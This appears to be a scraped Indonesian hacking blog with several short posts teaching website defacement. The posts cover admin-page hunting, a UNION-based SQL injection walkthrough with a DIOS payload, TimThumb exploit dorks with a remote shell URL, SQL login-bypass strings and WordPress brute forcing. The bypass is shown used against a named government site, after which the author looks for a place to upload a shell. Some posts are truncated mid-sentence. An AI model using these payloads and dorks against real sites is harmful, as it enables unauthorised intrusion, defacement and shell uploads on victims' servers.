Heboh WOW

MENCARI ADMIN LOGIN MENGGUNAKAN VIEW PADA GAMBAR      hae guys ,  disini saya mau berbagi pengalaman saya mencari admin login manual .  karena saat kita terjebak di dunia alat. kita selalu menomer satukan alat seperti contoh nya admin finder . dan terkadang admin finder tidak menemukannya di karenakan admin finder menggunakan kumpulan kata-kata (wordlist)  halaman admin umum.       kebanyakan kumpulan foto / images disimpan di folder admin web . itulah kelalaian admin karena jika foto itu di view maka kita berada di directory admin . contoh : kita masuk ke web nya > kita cari gambar > klik kanan > view  maka hasil nya gini  nah tuh keliatan kan apa yg kita cari ,muncul  WP-content , berarti website nya memakai CMS WordPress dan tempat login nya di /wp-login.php taraaaaa ketemu kan login admin nya :) bukan hanya CMS WordPress , yang lain pun saya sering menjumpai nya . jadi kemungkinan besar kita berhasil menemukan login admin  karena kelalaian terhadap penempatan file image

SQL injection DIOS assalamualaikum wr.wb  selamat beraktifitas kawan , ini pertama kali saya nge blog jadi di maklumi yah ^_^ Kali ini saia ingin share , SQL injection DIOS Oke langsung saja Contoh target: localhost/command.php?id=100 Selanjutnya kalian mencari jumlah column Dengan , " order by " contoh: localhost/command.php?id=100+order+by+1--+  , lanjut terus sampai menemukan error Contoh: localhost/command.php?id=100+order+by+1--+ [ Normal ] localhost/command.php?id=100+order+by+2--+ [ Normal ] localhost/command.php?id=100+order+by+3--+ [ Normal ] localhost/command.php?id=100+order+by+4--+ [ Error ] Error nya terdapat di nomor 4 , berarti jumlah column Ada 3 , knapa bisa 3 Karena error nya di 4 Selanjutnya Kita mulai dengan " union+select+ " Contoh: localhost/command.php?id=100+union+select+1,2,3--+ Nanti Akan muncul angka cantik nya :v Misalkan angka nya 1 Dan 2 Selanjutnya Kita masukkan DIOS " (select(@x)from(select(@x:=0x00),(select(0)from(information_sc

hello hay :v assalamualaikum wr.wb     jumpa lagi dengan saya :'v . kali ini saya akan berbagi tools admin login, nah pencari admin login mesin bermacam macam bentuk bahasa pemrogaman ada yang basis  python , php , perl , dll    kali ini saya akan share tools admin finder tool yang berbasis .php dan sudah tersedia ribuan wordlist jadi pengunjung tinggal makai :) seperti gambar di atas tampilannya , langsung saja bisa anda kunjungi disini KLIK SAYA :V  cara memakai nya tinggal masukin site nya , lalu tekan find it!!!  semoga beruntung , kalo ga beruntung berarti anda jelek :v # jika ingin script admin finder nya bisa minta ke saya langsung ke sini terimakasih wassalamualaikum wr.wb thanks to : all admin PenggilaCroot07 Ghost_C0d3r all defacer indonesia

   Lets say hello semua , ini artikel gw yang pertama ea mamhank :v kali ini gw akan bahas tentang deep web...hmmm kalau kalian sering baca" tentang deep web di google pasti kalian piker serem masuk ke deep web :v ada yang bilang di deep web banyak virusnya , vidionya serem" halah belum pernah masuk aja udah nyebarin HOAX wkwkwk :v   jadi gw bahas gk kek bog atau web laen yang terlalu melebaykan deep web :v yg bilang deep web ini itu nakut nakutin aje lu kamvang :v   Sebenernya deep web itu gunanya banyak , misalnya tutorial tentang hacking yang belum tentu ada di search engine tante google , jadi jangan mikir deep web itu serem yak :v berikut list site UNION yang udah pernah gw cek cek ki dot :v HIDDEN WIKI DEEP WEB LINKS Hidden Service lists and search engines http://3g2upl4pq6kufc4m.onion/ – DuckDuckGo Search Engine http://xmh57jrzrnw6insl.onion/ – TORCH – Tor Search Engine http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page – Uncensored Hidden Wiki http://32rfckwuorlf4

Hallo gan.... kali ini saya share tentang cara Deface Methode Tim-thumb Exploit WordPress Oke kita mulai ya jgn banyak bacot :v Bahan dork kopi rokok Internetan :v Exploit ?src=http://flickr.com.x-groups.org/M3PS.php Dork : i nurl:/wp-content/themes/TheStyle/ inurl:/wp-content/themes/nool/ inurl:/wp-content/themes/PersonalPress/ inurl:/wp-content/themes/SimplePress/ inurl:/wp-content/themes/DeepFocus/ inurl:/wp-content/themes/DelicateNews/ inurl:/wp-content/themes/Bold/ inurl:/wp-content/themes/eStore/ inurl:/wp-content/themes/TheProfessional/ inurl:/wp-content/themes/OnTheGo/ inurl:/wp-content/themes/AskIt/ inurl:/wp-content/themes/Nova/ inurl:/wp-content/themes/eNews/ inurl:/timthumb.php? site:. inurl:/admin/timthumb.php? site:. 1. Pertama Kamu ngedork dulu di om google :) 2. Cari Target nya.... gw uda pnya live target hehe :v 3. Tambahin di blkng nya http://site.com/timthumb.php mencari vuln atau ga :v  contoh nya yang di bawah ya  3. sekarang masukan exploitnya contoh nya http://si

PoC bypass admin halo gan.... w sebagai penyumbang baru mau share tutor deface metode bypass admin pasti ada yng sudah tau kan.. oke ngk usah banyak bacod '-' Dork : inurl:/administrator/login.php            inurl:/admin/login.php *bisa juga di tambah site (kembangin lagi pakai otak vokep lu) bypass : '="or'               'or 1=1 limit 1-- -+  oke next step kita dorking di mbah google seperti ini sekarang w coba bypass web pariwisata.bogorkab.go.id dengan menggunakan bypass di atas :v masuk admin login mari kita bypass menggunakan 'or 1=1 limit 1-- -+ atau bisa juga '="or' lalu klik oc :v dan damm.... kita tinggal cari tempat upload shell and boom :v taraaaa kita sudah jadi admin web tersebut :'v sekian dari saya dan terima kasih :v by sleppy saya minta maaf terhadap admin web tersebut saya harapkan agar di perbaiki web

hello assalamualaikum wr.wb      in here i will share Zone-H Mass Notifier Tool base .php   Author by T1KUS90T you can visit here or you can download the script in here Have a nice day bro :) wassalamualaikum wr.wb

halo halo halo assalamualaikum wr wb         kali ini saya akan share tools mass notifier defacer.id buat kalian yang suka mirror di defacer.id tapi kalo mirror harus dikit-dikit  karena adanya cloudflare nah saya disini akan share tools nya :) description    : mass notifier for defacer.id author           : PakL0nc4t github            : https://github.com/p4kl0nc4t date release  : 22/01/2018 tested on kali linux 2017.3 firefox esr tools nya memakai pip2 ya gan :) cara install buka termux / terminal lalu ketik : apt-get install nodejs pip2 install defid_notifier pip2 install defid_notifier --upgrade         kalau sudah berhasil di install dan di upgrade , sekarang tinggal cara pakai nya . buat file isinya list web nya yang mau di mirror dengan ekstensi .txt nama file terserah dan terserah di taruh di folder bagian mana . contoh di folder /web/listmirror.txt command nya begini : defid_notifier (list web yang mau di mirror) (nama defacer) ("nama team") contoh : defid_notifie

perl wordpress brute force / WPBF hay assalamualaikum  wr.wb slamat pagi siang sore malem :v ketemu lagi dengan saya CYBERSCRY atau juga di sebut CYBERSCRYTECH , atau juga bisa CYBERSCRYTECH_ , wkwkw panjang amat eak kali ini saya akan membagikan tools WordPress Brute Force atau sering kita sebut WPBF langsung saja ea    pertama kita harus tahu dulu username login WordPress nya cara mengetahui nya biasanya menggunakan username default dari WordPress yaitu admin cara mengetahui username nya admin kita coba username di isi admin dan password nya terserah ngawur juga tidak apa-apa gan :v jika hasilnya seperti gambar di bawah ini        gambar di atas tertulis ERROR invalid username , berarti username nya salah gan bukan admin , jadi kita tidak bisa brute force nya     jika username nya benar admin maka akan seperti gambar di bawah ini dan kita tinggal brute force    gambar di atas tertulis:  ERROR the password you entered for the username admin is incorrrect    itu maksudnya u